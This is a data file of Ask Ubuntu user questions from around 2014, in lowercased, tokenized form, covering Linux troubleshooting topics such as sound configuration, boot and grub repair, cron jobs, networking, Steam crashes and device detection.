430501	bad sound on kubuntu 12.04	bad sound on kubuntu 12.04.4 . on windows sound better . also on kubuntu rattle speakers on windows not rattle . sound is always no more than 100 % this is my daemon.conf # this file is part of pulseaudio . # # pulseaudio is free software ; you can redistribute it and/or modify # it under the terms of the gnu lesser general public license as published by # the free software foundation ; either version 2 of the license , or # ( at your option ) any later version . # # pulseaudio is distributed in the hope that it will be useful , but # without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the gnu # general public license for more details . # # you should have received a copy of the gnu lesser general public license # along with pulseaudio ; if not , write to the free software # foundation , inc. , 59 temple place , suite 330 , boston , ma 02111-1307 # usa . # # configuration file for the pulseaudio daemon . see pulse-daemon.conf ( 5 ) for # # more information . default values are commented out . use either ; or # for # # commenting . daemonize = yes ; fail = yes ; allow-module-loading = yes ; allow-exit = yes ; use-pid-file = yes ; system-instance = no ; local-server-type = user ; enable-shm = yes ; shm-size-bytes = 0 # setting this 0 will use the system-default , usually 64 mib ; lock-memory = no ; cpu-limit = no ; high-priority = yes ; nice-level = -11 ; realtime-scheduling = yes ; realtime-priority = 5 ; exit-idle-time = 20 ; scache-idle-time = 20 ; dl-search-path = ( depends on architecture ) ; load-default-script-file = yes ; default-script-file = /etc/pulse/default.pa ; log-target = auto ; log-level = notice ; log-meta = no ; log-time = no ; log-backtrace = 0 resample-method = speex-float-7 ; enable-remixing = yes ; enable-lfe-remixing = no flat-volumes = no ; rlimit-fsize = -1 ; rlimit-data = -1 ; rlimit-stack = -1 ; rlimit-core = -1 ; rlimit-as = -1 ; rlimit-rss = -1 ; rlimit-nproc = -1 ; rlimit-nofile = 256 ; rlimit-memlock = -1 ; rlimit-locks = -1 ; rlimit-sigpending = -1 ; rlimit-msgqueue = -1 ; rlimit-nice = 31 ; rlimit-rtprio = 9 ; rlimit-rttime = 1000000 ; default-sample-format = s16le ; default-sample-rate = 44100 ; alternate-sample-rate = 48000 ; default-sample-channels = 2 ; default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 25 ; enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 ; deferred-volume-extra-delay-usec = 0
430502	is running ubuntu/xp duel boot safe now that xp is being pulled ?	i 'm new to askubuntu and i was hoping someone might be able to provide some insight into a question i have . i run a duel-boot pc with ubuntu/winxp and , despite xp being pulled this april , i 'd like to continue using xp safely . the reason for this is that , whilst i have a dual-boot , i use ubuntu about 95-99 % of the time but there is the very rare occasion when i need windows . what i plan to do is keep linux as my everyday os and only use xp without a network connection . what i 'd like to know is , would you deem this as safe ? with both os ' being on the same drive ( albeit on different partitions ) , is one os vulnerable to getting a virus from the other i.e linux to windows ? can a virus `` jump '' from one partition to another ? i apologise if this sounds trivial but i 'm not too clued up on the nature of partitions . i have considered upgrading to win7/8 but spending âł100+ really would n't be warranted , many thanks , rob
430503	ubuntu has not detected operating system	i have dell new inspiron 15 ( i7 ) windows 8 64bit and i tried to install ubuntu but it did n't offer me the option to install ubuntu alongside my windows . i tried almost everything on google and someone said that if i use boot-repair the information in here might help solve my problem : http : //paste.ubuntu.com/7045912/ . thanks !
430508	chroot to repair grub gives corrupted shared libraries	i 'm currently trying to repair a system that 's stuck at the grub rescue > prompt . it seems like grub needs to be reinstalled , so i 'm following some prior threads to get there . trying to chroot into a mounted filesystem to reinstall grub ( after booting an ubuntu livecd to restore ) , per this previous thread . i 've got everything mounted , but the chroot command fails with an error like this : chroot : failed to run command `/bin/bash ' : error accessing corrupted shared library not sure what causes this , but ca n't find much reference online for to how to address this error .
430509	can not run cron job for a php script	i want to run a php script using cron job on localhost my script is situated at - /opt/lampp/htdocs/rrugd/myscript.php now as opt is under root , i tried adding the cron job for root as well as normal user but its not executing . here is my cron job for executing the php script every 2 mins . */2 * * * * php /opt/lampp/htdocs/rrugd/myscript.php my script is basically meant to truncate a table from the database.it will actually be happening at midnight , so the actual variables of cron job will change to 00 00 * * * php /path/to/script.php but for testing ive used every 2min . ive searched on the internet and ask ubuntu , but i cant get it to run . i saw something related to setting a path but i didnt understand what is to be done exactly in that method . also , i would like to specify that the php script myscript.php did not execute on cli with the php command . but it does execute when executed or called through the browser on localhost ! what am i exactly doing wrong ? ive spent last 2/3 hours on this ! i am using cron job 1st time . thankyou ! edit php version - some @ somepc $ : php -v php 5.5.3-1ubuntu2.2 ( cli ) ( built : feb 28 2014 20:06:05 ) copyright ( c ) 1997-2013 the php group zend engine v2.5.0 , copyright ( c ) 1998-2013 zend technologies with zend opcache v7.0.3-dev , copyright ( c ) 1999-2013 , by zend technologies
430511	bootup script insertion	how can i insert the following scripts to run during bootup ? these scripts are : apm=off no=hlt the function of these scripts is to prevent premature laptop shutdown when my laptop is a little bit hot but not hot enough to burn the cpu .
430513	tool like geektool [ see logs on your desktop ]	anyone know of a good alternative to geektool in macos x ? i recently switched to ubuntu and it 's not compatible with ubuntu . geektool lets you display various information on your desktop , like log files , system ressource usage or the output of any shellscript .
430516	is there a program for analyzing ntp server statistics ?	i 'm running ubuntu 12.04 and have the ntp server running , apparently ok . i run the meinberg ntp server on my two windows 7 boxes and use its associated server monitor to keep track of what it 's up to . is there a similar linux monitor , preferably one with a gui that can show me how my clock is behaving , etc ?
430517	my password do n't works in graphical mode	i 've been ubuntu user for 7 years and have 13.10 from it was launched , and worked ok , until now . now i have a problem , when i 'm working in graphical mode and for example i try to use synaptic , the authentication window opens and i type it , but the system does n't accept the password . however , if i go to the terminal and type sudo synaptic , it asks me for my password , i type the same password , and synaptic opens without any problem . this is happening for any operation in graphical mode , what can be happening ?
430521	can not find file /dev/vmnet0	i am working on ubuntu lts 12.04 server on vmware workstation environment . i need to add permissions to the file vmnet0 corresponding to the virtual interface . but i ca n't find it in the /dev directory . ( i have already installed vmware-tools ) how can i add the corresponding file ?
430524	is there software like crossftp for cloud file downloading on ubuntu ?	i have crossftp on my ubuntu desktop at home but for some reason , crossftp is not installing . its proprietary software so it requires that i `` buy '' it from the ubuntuone store but really its free so it just takes you through an extra step before you can use it . only problem is that step has an error so i can get the application . i can use filezilla for ftp but thats not what i need crossftp for . i need to download some files from my amazon as3 console . does anyone know of a way that i can do this without crossftp ? thanks in advance .
430526	get back windows 8 ?	so , i just downloaded ubuntu 12.04 , and i `` lost '' windows 8.i clicked the wrong button ... i 've tried so many things to get it back , but i have lost my hopes now . please , i hope someone have knowledge about this , and can help me with this . i really need windows 8 on my pc .
430535	steam does n't start - segmentation faults	[ solved ] i managed to fix the issue by uninstalling the proprietary amd drivers , rebooting , starting steam letting it update , reinstalling amd drivers , reboot . it seems to be working and i can now play all my steam linux games . i just installed ubuntu 13.10 64bit on my main pc . i also installed steam ( .deb from steampowered.com ) . the install went without errors . on running steam , nothing happens . i run steam from the terminal and receive two segmentation faults , always occurring on different lines of steam.sh when i run steam : /home/samathy/.local/share/steam/steam.sh : line 755 : 11111 segmentation fault /home/samathy/.local/share/steam/steam.sh : line 755 : 11239 segmentation fault the rest of the output on the terminal is just dump-saving text . i ca n't see anything about glx issues , or locale issues ( they seem to be popular issues with steam ) i 'm running ubuntu 13.10 64bit with xubuntu ( installed after the ubuntu install . ) my specs are as follows : amd fx 6350 . amd hd7870 ( with amd proprietary beta drivers ) 12gb ddr3 samsung 840 evo 120gb . this problem is a little weird to me because steam runs fine on my ubuntu 13.10 + xubuntu-desktop , intel atom n270 netbook without any fiddling , i can even run games . i 've googled a lot and only really found solutions to other steam issues , not my own . if anyone could help , that 'd be wonderful . thanks ! edit : i should mention that i 've tried doing ~ $ steam -- reset it does not produce errors its self , but also doesnt solve the problem either . i have also tried installing steam from ubuntu package manage , but that results in the same errors .
430536	ubuntu sdk do n't run apps	i have ubuntu 12.04 , and i install ubuntu-sdk following the instructions of the oficial page of ubunut . but when i try to launch the demo app , i get this : starting ubuntu-html5-app-launcher -- www=/home/saeron/ubuntusdk/test/www -- inspector failed to start program . path or permissions wrong ? ubuntu-html5-app-launcher exited with code -1 i cant use the command line ( ubuntu-html5-app-launcher ) for launch the app , so i think i have not this program , bu i cant find in the reps . i saw many things in internet about this but no one solve my problem . it is not posible use this sdk in 12.04 ? , because in the oficcial page show that is a valid version . probably it is a stupid thing but i cant find solution . i only wan na try to desing a webapp , so i dont test the others options , and the true i dont need it i just wan na solve the problems whit the html5 apps .
430538	home network with ubuntu and windows computers	i have 2 computers : ubuntu 13.10 and windows 8.1 . both of them wired to router . ethernet connection on ubuntu : ipv4 settings . method : automatic ( dhcp ) ipv6 settings . method : automatic windows setting are the same . obtain ip/ipv6 address automatic i 'd like to organize home network with these two computers . how it can be done ?
430541	laptop wo n't boot without power cable connected	my laptop is an acer aspire 5750 that used to run windows 7 but is now dual-booted with ubuntu 12.04 ( now my predominant os ) . recently an annoying bug developed in that my laptop wo n't boot without being connected to the charger . once booted i can unplug the charger and use as normal , which gives me around 2 hours of battery life . i do n't know what is causing this and would like any advice . for the record this is the contents of /sys/class/power_supply/bat0 : == > /sys/class/power_supply/bat0/alarm < == 0 == > /sys/class/power_supply/bat0/capacity < == 76 == > /sys/class/power_supply/bat0/charge_full < == 1995000 == > /sys/class/power_supply/bat0/charge_full_design < == 4400000 == > /sys/class/power_supply/bat0/charge_now < == 1517000 == > /sys/class/power_supply/bat0/current_now < == 741000 == > /sys/class/power_supply/bat0/cycle_count < == 0 == > /sys/class/power_supply/bat0/device < == == > /sys/class/power_supply/bat0/manufacturer < == panasonic == > /sys/class/power_supply/bat0/model_name < == li_ion_4000ma == > /sys/class/power_supply/bat0/power < == == > /sys/class/power_supply/bat0/present < == 1 == > /sys/class/power_supply/bat0/serial_number < == 0008 == > /sys/class/power_supply/bat0/status < == discharging == > /sys/class/power_supply/bat0/subsystem < == == > /sys/class/power_supply/bat0/technology < == li-ion == > /sys/class/power_supply/bat0/type < == battery == > /sys/class/power_supply/bat0/uevent < == power_supply_voltage_min_design=10800000 power_supply_voltage_now=11422000 power_supply_current_now=741000 power_supply_charge_full_design=4400000 power_supply_charge_full=1995000 power_supply_charge_now=1517000 power_supply_capacity=76 power_supply_model_name=li_ion_4000ma power_supply_manufacturer=panasonic power_supply_serial_number=0008 == > /sys/class/power_supply/bat0/voltage_min_design < == 10800000 == > /sys/class/power_supply/bat0/voltage_now < == 11422000 updated information : - without power the laptop wo n't even reach the acer logo or grub screen . it is simply completely unresponsive to the power button . - i have also found that if i put the laptop into sleep mode when it boots back up it has been completely restarted , it does n't save the current session as it should despite having full battery when turned off ( it also did n't drain any battery at all during 'sleep ' )
430543	problem enabling wireless and wired networking at the same time	i have a computer with one wireless ( wlan0 ) and 2 wired ( eth0 and eth1 ) network ports . i want this scenario : wlan0 and eth0 to use dhcp for connection to the internet on boot , with wired taking priority . eth1 to be always on with static ip so that i can plug my laptop in and connect directly with ssh if needed . i 've tried to configure this with networkmanager but when i enable eth1 it always disables the wireless . i 've checked the box `` use this connection only for resources on this network '' for all interfaces ... . any advice is greatly appreciated . p
430548	no option to dual boot while installing	when i am installing 13.10 , i do not get an option to dual boot with windows 8 . its probably because i have windows 8 . it says it does n't detect an os but i know 8 is there .
430549	gnome-ppp reconecting after one hour	my gnome-ppp application gets disconnected after one hour and then reconnects again . because of this i am losing many downloads . is there any setting to avoid this ?
430550	during upgrade to 13.10 a screen asks `` do you wan to start the upgrade ? ''	when i hit y or enter nothing happens . the screen tells what is being updated and shows details of the 1248 packages . there is no place on the screen to say go ahead . i 'm updating from 13.04 on a dell netbook with a 1gb hard drive .
430551	will ubuntu run on a gateway computer ?	i am a bit financially strapped and received a gateway gt5056 tower . the tower has an amd dual core 64-bit processor in it . will the 12.04 lts version run on this machine ? i will not have any other system other than libre office installed .
430557	virtualbox problems	i 'm running ubuntu linux 12.04 and trying to install a version of windows os onto my virtualbox . i already have win 7 ultimate running and i would like to also run win 8 from .iso file . i 've been using the win7 vbox for a while , which i installed with a .iso using a bootable usb . i am trying to do the same thing-only now with a different os booted onto my usb but i ca n't seem to get it to to work . after creating a new machine and trying to boot so i can install win8 i get this message : fatal : no bootable medium found ! system halted . during the first run wizard i chose the .iso file as the media . should i have chosen the default ? i 've tried that too and same message . does this have anything to do with needing the virtualbox extenstion packages ? because i 've tried downloading those and run into errors as well . it does n't seem like i should need them however , as i installed my other windows without them . i will provide more info if needed , thanks for any help .
430558	static ip for ubuntu 13.10 server ( virtualbox )	i 'm trying to change my ubuntu virtualbox ( guest ) to a static ip . i have a bridged network enabled which allows me to easily ssh into the virtual box from my mac . when inside the ubuntu virtual box , and i run ifconfig i get the following : eth0 link encap : ethernet hwaddr 08:00:27:01:64 : ea inet addr:192.168.43.161 bcast:192.168.43.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe01:64ea/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:163 errors:0 dropped:0 overruns:0 frame:0 tx packets:124 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17856 ( 17.8 kb ) tx bytes:14776 ( 14.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) the machine works fine , i 'm able to access my urls hosted on the box via apache , and the box itself is also able to access the internet . to convert to static , i 'm editing my /etc/network/interfaces file and adding the following information : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 192.168.43.161 netmask 255.255.255.0 gateway 192.168.43.1 i 'm using the same ip address as given by ifconfig , and i acquired the ip address from the route -n command . kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.43.1 0.0.0.0 ug 0 0 0 eth0 192.168.43.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 however , the moment i change to a static ip address this way , the virtual box loses the ability to connect to the internet . what am i doing wrong ?
430559	high cpu usage on ubuntu 12.04	i just installed ubuntu 12.04 on my asus k53s notebook . processor is intel® core™ i5-2410m cpu @ 2.30ghz × 4 5.7 gib ram . the cpu usage gets very high after a while , specially when using internet . it does n't get under 70 % on cpu 1 , after this acceleration process starts . i 've tried some thing on the terminal , but no results on that problem . hope someone knows a good solution for this case ! here is the information after running the top command : top - 18:31:21 up 41 min , 2 users , load average : 1.02 , 0.93 , 0.64 tasks : 208 total , 3 running , 205 sleeping , 0 stopped , 0 zombie cpu ( s ) : 1.8 % us , 20.7 % sy , 0.0 % ni , 77.0 % id , 0.5 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 6019916k total , 1268444k used , 4751472k free , 31704k buffers swap : 4881404k total , 0k used , 4881404k free , 824920k cached pid user pr ni virt res shr s % cpu % mem time+ command 4 root 20 0 0 0 0 r 77 0.0 8:53.81 kworker/0:0 1203 root 20 0 267m 48m 30m s 4 0.8 1:09.41 xorg 1756 leo 20 0 1252m 78m 34m s 3 1.3 1:00.06 compiz 2724 leo 20 0 519m 17m 11m s 2 0.3 0:01.73 gnome-terminal 2789 leo 20 0 17456 1404 980 r 1 0.0 0:01.71 top 1 root 20 0 24596 2484 1352 s 0 0.0 0:00.95 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:00.07 ksoftirqd/0 5 root 0 -20 0 0 0 s 0 0.0 0:00.00 kworker/0:0h thanks a lot ! leopoldo
430561	ubuntu boots to grub menu and starting ubuntu leads to black screen	i have a system76 laptop that came pre-installed with ubuntu . i have used this laptop for about 1 year now . it has had no problems and is currently running ubuntu 13.10 . i turned the laptop on today and it booted to grub menu . when i choose booting ubuntu or any of the advanced options it goes to a black screen with the fan running . it worked fine the yesterday and i do n't believe i have installed anything new . i would like to give you more information but i 'm not able to get any output from it . i 've tried recovery mode but i do not know what to put into the command line . if you have any ideas i would greatly appreciate it . thanks ! ! edit : i can not open up a terminal . deleting quiet and splash , or adding in nomodeset , still leads to a black screen . i have nvidia , but have been using it for a year . the only things that work are using cltr+alt+del to reboot and i can turn of the screen , using fn+f2 .
430565	black screen on resume after upgrade to 13.10 on dell d620	dell d620 , intel 945gm graphics , using b43 proprietary wlan driver , all else standard . after wake from suspend a black screen is displayed with a selection cursor ( white arrow ) . 13.04 was working fine on resume , this error has only occurred after upgrade install to 13.10 . occasionally the screen will `` wake-up '' correctly , and less often it will wake after several minutes of the black screen with white cursor . more often though the only thing that works is hard reboot . also alternate terminals seem to be unavailable using the alt-fx keys . i 'm suspecting an x11 issue , but ca n't find any errors in logs that seem relevant . i 've worked with several other distros , but this is my first `` production '' experience with ubuntu . any clue or troubleshooting steps welcome .
430569	amazon ec2 ubuntu apt repos outage ?	is there something happened on ubuntu mirror repos hosted on amazon s3 archive ? i got the message `` forbidden 403 '' returned from ubuntu s3 archive it used to work before , but it stopped working anymore recently . please advise $ apt-get -y install ruby1.8 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : puppet-common : depends : libxmlrpc-ruby depends : libopenssl-ruby depends : libshadow-ruby1.8 but it is not going to be installed depends : libaugeas-ruby1.8 but it is not going to be installed depends : facter ( > = 1.5 ) but it is not going to be installed depends : facter ( < 2.0 ) but it is not going to be installed recommends : debconf-utils but it is not going to be installed ruby1.8 : depends : libruby1.8 ( = 1.8.7.352-2ubuntu1.4 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . err http : //us-east-1.ec2.archive.ubuntu.com.s3.amazonaws.com/ubuntu/ precise/main augeas-lenses all 0.10.0-0ubuntu4 403 forbidden ... ... ... ... . ... ... ... ...
430576	ubuntu 13 linux-image wo n't upgrade	i just did software updates that included linux-headers for which there are no image files in /boot . the only image and related files in /boot are for version 3.8 /boot/abi-3.8.0-30-generic /boot/config-3.8.0-30-generic /boot/initrd.img-3.8.0-30-generic /boot/system.map-3.8.0-30-generic /boot/vmlinuz-3.8.0-30-generic here is what was installed today for instance ( taken from /var/log/dkpg.log ) .. 2014-03-06 14:08:18 install linux-headers-3.11.0-18 : all < none > 3.11.0-18.32 2014-03-06 14:08:28 install linux-headers-3.11.0-18-generic : amd64 < none > 3.11.0-18.32 i see i am getting only the headers , and never the images ! .. $ dpkg -l | grep linux- ii linux-firmware 1.116.2 all firmware for linux kernel drivers ii linux-headers-3.11.0-14 3.11.0-14.21 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-14-generic 3.11.0-14.21 amd64 linux kernel headers for version 3.11.0 on 64 bit x86 smp ii linux-headers-3.11.0-15 3.11.0-15.25 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-15-generic 3.11.0-15.25 amd64 linux kernel headers for version 3.11.0 on 64 bit x86 smp ii linux-headers-3.11.0-17 3.11.0-17.31 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-17-generic 3.11.0-17.31 amd64 linux kernel headers for version 3.11.0 on 64 bit x86 smp ii linux-headers-3.11.0-18 3.11.0-18.32 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-18-generic 3.11.0-18.32 amd64 linux kernel headers for version 3.11.0 on 64 bit x86 smp ii linux-headers-generic 3.11.0.18.19 amd64 generic linux kernel headers rc linux-image-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-30-generic 3.8.0-30.44 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-30-generic 3.8.0-30.44 amd64 i have watch many linux- upgrades go by with similar results . i do not get the upgrades into /boot . when i boot up and select advanced options , only 3.8 is listed . i worry . anybody know what may be going wrong ?
430577	unable to press alt + super + right click	i have successfully installed ubuntu 13.10 on my macbook air 6,2 . after installing gnome-panel and loading a gnome classic session , i began trying to remove the bottom panel . suggestions of using gconf and dconf did not work . the option does not show up in gconf and changing the values within dconf to only have the top panel were not successful . i am told to press alt+super and then mouse : right on the gnome panel i wish to modify . i attempted to do so and have had no luck . i have even connected an usb mouse to be sure i was right clicking correctly . ideally , i 'll be able to fix this problem so that it does n't happen with other programs and other combinations , however , i 'll settle for a fix on how to remove gnome panel 's bottom panel .
430580	lock screen do n't works	when i press ctrl+alt+l my screen do n't lock , even if i click on the word `` freeze '' my ubuntu 13.10 do n't lock my screen . what can i do ?
430581	fatal : module loop not found	i am getting the error fatal : module loop not found . i am trying to mount an iso . when i mount the iso this error appears : mount : could not find any loop device . maybe this kernel does not know about the loop device ? ( if so , recompile or `modprobe loop ' . ) i asked on irc and was told to submit a ticket . ( using ubuntu 12.04 ) thanks , fetz
430582	share internet connection ( via hotspot ) with a lan with ieee 802.1x encryption	my dorm internet is protected with ieee 802.1x encryption ( microsoft peap ) and i want to share the connection with my phone , but so far , i have n't been able to do it . i can create the hotspot , but the phone does n't connect to the internet . is there any way to share it ? it is not that i do n't know how to create a hotspot , i 've been using it at home during last year , but now , i 've moved to a new home and to access the internet i need to configure a proxy and use my username and password for university and also it is protected with verification according to the standard ieee 802.1x and protocol peap , so even if i create the hotspot and connect to it , the phone/other computer/tablet/whatever ca n't go to internet . i need something to tell the hotspot to go through the proxy and authentication , because i think that 's the problem these are the instructions for windows http : //www.vscht-suz.cz/content/files/how_to_connect_en.pdf in case i could n't make myself clear enough
430585	stuck in ubuntu 10.10	i opened my old laptop for the first time in years , and it 's still on ubuntu 10.10 . ca n't seem to figure out how to get it to upgrade to the most recent version . any help would be appreciated ?
430591	trying to install drivers to get an hp 3512 deskjet printer to run on ubuntu 12.04 lts but nothing works !	according to the store i bought it from and the hp website , the hp 3512 is linux-compatible . but the install cd packaged with the unit did nothing but spin uselessly when inserted in the dvd/cd drive . i then downloaded the hplip software from the hp linux imaging and printing site http : //hplipopensource.com/hplip-web/index.html ? and tried to install it using the terminal command strings given . again , nothing happened , not even an error message . can anyone suggest a workaround ? i 'm a total linux newbie ( although i 've been using computers since ms-dos 5.0 ) .
430592	installing openjdk 7 didnt install javac	i am very new to using the linux operating system and i 'm currently using ubuntu 13.10 coming off using windows for my whole life . i have been trying to get java development kit installed so i could create and compile java programs . however , when i installed the openjdk program from the ubuntu software center everything went fine and the program installed except it seems as though it did n't install javac to compile . when i open up terminal and type javac it comes up telling me where it can be found implying it was n't installed . so i was wondering what i need to do in order to get javac to be installed so i could compile in programs such as eclipse . thanks in advance .
430594	all the special keys are recognized as left shift	i have a keyboard i got from out of country , and while everything works fine in windows , every distro of linux that i have installed has the same problem where the left and right ctrl , alt and meta keys and the right shift key are recognized as left shift . ive tried messing around with xmodmap and i cant map a key that is n't recognized with xev . i really do n't want to go back to windows , please help !
430598	error when trying to connect mp3 player with mtp	i have an older philips gogear vibe mp3 player . i do n't know exactly what is wrong with it , maybe i disconnected it at some point without unmounting first , but i suspect the file system is damage . it is no longer automatically recognized and mounted when i plug it in , neither in ubuntu nor under windows . the problem is similar to the one described in here , but not quite the same as my device is n't an android device . observation 1 : the device is listed when i run 'lsusb ' , but is not listed under 'fdisk -l ' . if i run mtp-detect it first fails , then running it again , i get : device 0 ( vid=0471 and pid=207b ) is a philips gogear vibe sa1vbe04/08 . found 1 device ( s ) : philips : gogear vibe sa1vbe04/08 ( 0471:207b ) @ bus 1 , dev 2 attempting to connect device ( s ) error 2 : ptp layer error 02ff : get_all_metadata_fast ( ) : could not get proplist of all objects . error 2 : error 02ff : ptp : i/o error error 2 : ptp layer error 02fe : get_handles_recursively ( ) : could not get object handles . error 2 : error 02fe : ptp : protocol error , data expected usb low-level info : bcdusb : 512 bdeviceclass : 0 bdevicesubclass : 0 bdeviceprotocol : 0 idvendor : 0471 idproduct : 207b in endpoint maxpacket : 512 bytes out endpoint maxpacket : 512 bytes raw device info : bus location : 1 device number : 2 device entry info : vendor : philips vendor id : 0x0471 product : gogear vibe sa1vbe04/08 vendor id : 0x207b device flags : 0x00000002 device info : manufacturer : philips model : gogear vibe device version : ph0f000626 serial number : 2aff00002e1d91830002da9553621183 vendor extension id : 0x00000006 vendor extension description : microsoft.com : 1.0 ; microsoft.com/wmdrmpd : 10.1 ; microsoft.com/wmppd : 10.0 ; microsoft.com/wmppd : 11.0 ; audible.com : 1.0 detected object size : 64 bits extensions : microsoft.com : 1.0 microsoft.com/wmdrmpd : 10.1 microsoft.com/wmppd : 10.0 microsoft.com/wmppd : 11.0 supported operations : 1001 : get device info 1002 : open session 1003 : close session 1004 : get storage ids 1005 : get storage info 1006 : get number of objects 1007 : get object handles 1008 : get object info 1009 : get object 101b : get partial object 100b : delete object 100c : send object info 100d : send object 1014 : get device property description 1015 : get device property value 1016 : set device property value 9802 : get object property description 9801 : get object properties supported 9803 : get object property value 9804 : set object property value 9805 : get object property list 9806 : set object property list 9808 : send object property list 9101 : get secure time challenge 9102 : get secure time response 9103 : set license response 9104 : get sync list 9105 : send meter challenge query 9106 : get meter challenge 9107 : get meter response 9108 : clean data store 9109 : get license state 910a : send wmdrm-pd command 910b : send wmdrm-pd request 100f : format storage 9810 : get object references 9811 : set object references 9201 : report added/deleted items 9202 : report acquired items 9203 : get transferable playlist types 97f1 : unknown ( 97f1 ) 97f2 : unknown ( 97f2 ) 97f3 : unknown ( 97f3 ) 97f4 : unknown ( 97f4 ) 97f5 : unknown ( 97f5 ) 1010 : reset device 1012 : set object protection events supported : 0x4004 0x4005 device properties supported : 0xd101 : secure time 0xd102 : device certificate 0xd402 : friendly device name 0xd401 : synchronization partner 0x5001 : battery level 0xd405 : device icon 0xd100 : unknown property playable file ( object ) types and object properties supported : 3009 : mp3 dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9a : album name string data type get/set dc46 : artist string data type get/set dc9b : album artist string data type get/set de93 : sample rate uint32 data type enumeration : 8000 , 11025 , 16000 , 22050 , 32000 , 44100 , 48000 , read only de94 : number of channels uint16 data type enumeration : 1 , 2 , get/set de9a : audio bit rate uint32 data type range : min 1 , max 4300000 , step 1 read only dc44 : name string data type get/set dc89 : duration uint32 data type range : min 0 , max 16777215 , step 1 get/set de99 : audio wave codec uint32 data type enumeration : 0 , 80 , 85 , get/set dc09 : date modified string data type datetime form get/set dc8b : track uint16 data type any 16bit value form get/set dc8c : genre string data type get/set dc99 : original release date string data type datetime form get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set 3008 : ms wave dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9a : album name string data type get/set dc46 : artist string data type get/set dc9b : album artist string data type get/set de93 : sample rate uint32 data type enumeration : 8000 , 11025 , 16000 , 22050 , 32000 , 44100 , 48000 , read only de94 : number of channels uint16 data type enumeration : 1 , 2 , get/set de9a : audio bit rate uint32 data type range : min 5000 , max 2304000 , step 1 read only dc44 : name string data type get/set dc89 : duration uint32 data type range : min 0 , max 16777215 , step 1 get/set de99 : audio wave codec uint32 data type enumeration : 0 , 1 , 2 , 17 , get/set dc09 : date modified string data type datetime form get/set dc8b : track uint16 data type any 16bit value form get/set dc8c : genre string data type get/set dc99 : original release date string data type datetime form get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 32bit value form get/set dc92 : skip count uint32 data type any 32bit value form get/set b901 : wma dc01 : storage id uint32 data type any 32bit value form read only dc02 : object format uint16 data type any 16bit value form read only dc03 : protection status uint16 data type enumeration : 0 , 1 , read only dc04 : object size uint64 data type read only dc07 : object file name string data type regular expression form get/set dc08 : date created string data type datetime form get/set dc0b : parent object uint32 data type any 32bit value form read only dc41 : persistant unique object identifier uint128 data type read only dc42 : sync id string data type get/set dc0d : hidden uint16 data type enumeration : 0 , 1 , get/set dc4f : non consumable uint8 data type enumeration : 0 , 1 , get/set dc9a : album name string data type get/set dc46 : artist string data type get/set dc9b : album artist string data type get/set de93 : sample rate uint32 data type enumeration : 8000 , 11025 , 16000 , 22050 , 32000 , 44100 , 48000 , read only de94 : number of channels uint16 data type enumeration : 1 , 2 , get/set de9a : audio bit rate uint32 data type range : min 5000 , max 430000 , step 1 read only dc44 : name string data type get/set dc89 : duration uint32 data type range : min 0 , max 16777215 , step 1 get/set de99 : audio wave codec uint32 data type enumeration : 0 , 352 , 353 , get/set dc09 : date modified string data type datetime form get/set dc8b : track uint16 data type any 16bit value form get/set dc8c : genre string data type get/set dc99 : original release date string data type datetime form get/set d901 : buy flag uint8 data type range : min 0 , max 1 , step 1 get/set dc8a : rating uint16 data type range : min 0 , max 100 , step 1 get/set dc91 : use count uint32 data type any 